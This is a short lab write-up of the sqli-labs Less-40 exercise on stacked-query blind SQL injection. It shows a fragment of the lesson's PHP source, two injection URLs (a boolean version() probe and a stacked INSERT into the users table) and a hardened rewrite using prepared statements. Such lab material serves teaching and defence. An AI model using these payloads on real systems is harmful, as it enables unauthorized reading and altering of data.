sqli-Labs————less-40

Less-40


View the source code:






Less-40 **stacked Query String type Blind**



Welcome    Dhakkan
```php
';
printf("Your Username is : %s", $row[1]);
echo "
";
printf("Your Password is : %s", $row[2]);
echo "
";
echo "
";
}
// mysqli_free_result($result);
}
/* print divider */
if (mysqli_more_results($con1))
{
    //printf("-----------------\n");
}
//while (mysqli_next_result($con1));
}
/* close connection */
mysqli_close($con1);
}
else { echo "Please input the ID as parameter with numeric value";}
?>
```



Based on the SQL statement, we can give the following payload directly:


http://192.168.11.136/sqli-labs/Less-40?id=-1')or left(version(),1)=5 --+


Stacked injection:

http://192.168.11.136/sqli-labs/Less-40?id=1');insert into users(id,username,password) values ('101','hps','111')#
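A hardened version of the lookup that both payloads above target, as an added example (not code from the original post or from sqli-labs). It assumes the lesson concatenates `$id` inside `('...')` and runs the string with `mysqli_multi_query()`, which is what the payloads and the `mysqli_more_results()` call imply; the helper name `lookup_user`, the environment variable names and the selected column names (taken from the INSERT payload) are assumptions.

```php
<?php
// Added example: hardened replacement for the Less-40 style lookup.
// Assumed vulnerable pattern (not shown on the page, inferred from the payloads):
//   $sql = "SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
//   mysqli_multi_query($con1, $sql);   // runs every ';'-separated statement
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

// Hypothetical helper: returns [username, password] or null when no row matches.
function lookup_user(mysqli $con, string $rawId): ?array
{
    // 1. Enforce the "numeric value" the page's own error message asks for.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        throw new InvalidArgumentException('id must be a positive integer');
    }
    // 2. Prepared statement: the id is a bound parameter, never SQL text.
    //    mysqli_prepare() accepts a single statement, so a stacked "; INSERT ..." cannot run here.
    $stmt = mysqli_prepare($con, 'SELECT username, password FROM users WHERE id = ? LIMIT 1');
    mysqli_stmt_bind_param($stmt, 'i', $id);
    mysqli_stmt_execute($stmt);
    mysqli_stmt_bind_result($stmt, $username, $password);
    $row = mysqli_stmt_fetch($stmt) ? [$username, $password] : null;
    mysqli_stmt_close($stmt);
    return $row;
}

if (isset($_GET['id'])) {
    // Connection settings come from the environment (variable names are placeholders).
    $con = mysqli_connect(getenv('DB_HOST'), getenv('DB_USER'), getenv('DB_PASS'), getenv('DB_NAME'));
    try {
        $row = lookup_user($con, $_GET['id']);
        if ($row !== null) {
            // Encode on output so stored values cannot inject markup.
            printf("Your Username is : %s<br>", htmlspecialchars($row[0], ENT_QUOTES, 'UTF-8'));
            printf("Your Password is : %s<br>", htmlspecialchars($row[1], ENT_QUOTES, 'UTF-8'));
        }
    } catch (InvalidArgumentException $e) {
        http_response_code(400);
        echo "Please input the ID as parameter with numeric value";
    } finally {
        mysqli_close($con);
    }
} else {
    echo "Please input the ID as parameter with numeric value";
}
```

With this handler both requests above fail at the integer check with a 400 response, and the database account behind it should additionally lack INSERT rights on `users`.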



